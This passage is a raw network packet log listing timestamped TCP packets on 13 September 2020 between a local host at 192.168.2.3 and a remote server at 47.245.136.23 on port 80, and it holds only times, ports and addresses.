Sep 13, 2020 20:55:06.826131105 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826154947 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826181889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826231956 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826237917 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826281071 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826293945 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826306105 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826318026 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826329947 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826342106 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826351881 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826361895 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826363087 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826371908 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826381922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826391935 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826404095 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826416969 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826426983 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826443911 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826453924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826476097 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826493979 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826502085 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826580048 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826580048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826595068 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826677084 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826853037 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826925039 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826930046 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826950073 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826967001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826978922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826989889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827012062 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827020884 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827030897 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827101946 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827112913 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827112913 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827121973 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827141047 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827153921 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827164888 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827177048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827189922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827202082 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827214956 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827227116 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827239037 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827248096 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827250957 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827291965 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827311993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827322960 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827333927 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827344894 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827349901 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827359915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827369928 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827394009 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827405930 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827416897 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827429056 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827440977 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827445030 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827451944 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827461004 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827480078 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827491045 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827502012 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827512980 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827523947 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827527046 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827534914 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827553988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827565908 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827575922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827588081 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827600956 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827613115 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827624083 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827636957 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827649117 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827652931 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827660084 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827678919 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827701092 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827722073 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827742100 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827759027 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827765942 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827796936 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827809095 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827821016 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827832937 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827838898 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827846050 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827855110 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827873945 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827884912 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827894926 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827907085 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827918053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827923059 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.827929974 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827938080 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827956915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827967882 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827979088 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.827990055 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828001022 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828008890 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828012943 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828021049 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828042030 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828053951 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828064919 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828078032 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828088999 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828100920 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828111887 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828124046 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828135967 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828149080 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828160048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828160048 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828169107 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828186989 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828216076 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828227043 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828243017 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828259945 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828259945 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828270912 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828311920 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828324080 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828344107 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828349113 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828361034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828372002 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828383923 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828397036 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828408957 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828421116 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828433037 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828444958 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828452110 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828465939 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828476906 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828489065 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828501940 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828515053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828526974 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828538895 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828551054 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828562975 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828572035 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.828574896 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828583956 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828593016 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828612089 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.828692913 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.829559088 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.849039078 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849054098 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849066019 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849098921 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849112034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849128962 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849144936 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849162102 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849164009 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.849179029 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849189043 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849281073 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.849925995 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849937916 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849952936 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849972963 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849984884 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.849996090 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850004911 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.850006104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850019932 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850042105 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850054026 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850064039 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850132942 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850143909 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850145102 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.850157022 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850177050 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850188971 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850199938 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850212097 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850223064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850248098 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850301027 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850313902 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850315094 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.850322008 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850328922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850334883 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850342035 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850348949 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850356102 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850363016 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850369930 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850390911 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850399017 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850405931 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850419044 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850442886 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850450993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850517035 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850528002 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850534916 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850543976 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850552082 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850559950 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850568056 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.850572109 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850585938 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850605011 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850614071 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850620985 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850631952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850653887 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850662947 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850668907 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850682974 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850697041 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850709915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850725889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850737095 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850753069 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850766897 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850789070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850795984 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.850835085 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850843906 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850877047 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850888968 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850918055 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.850925922 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.851012945 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.851035118 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851049900 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851069927 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851114988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851124048 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.851130962 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851145029 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851161003 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851171970 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851187944 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851201057 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851212978 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851226091 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851238012 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851249933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851255894 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.851267099 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851284981 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851306915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.851356983 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.853125095 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853147030 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853163004 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853178024 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853190899 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853198051 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.853236914 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.870574951 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.894766092 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894788027 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894795895 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894804001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894810915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894819021 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894829035 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894836903 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894844055 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894851923 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894859076 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894866943 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894874096 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894881010 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894887924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894915104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894922972 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894929886 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894937038 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894951105 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.894961119 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894968987 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894975901 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.894983053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895004988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895013094 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895026922 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895035028 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895041943 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895065069 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895065069 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895072937 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895080090 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895112038 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895119905 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895127058 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895133972 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895140886 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895154953 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895167112 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895174980 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895181894 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895199060 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895200014 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895212889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895229101 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895236969 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895251036 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895258904 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895270109 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895286083 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895298958 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895312071 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895314932 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895319939 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895334005 CEST	80	49722	47.245.136.23	192.168.2.3
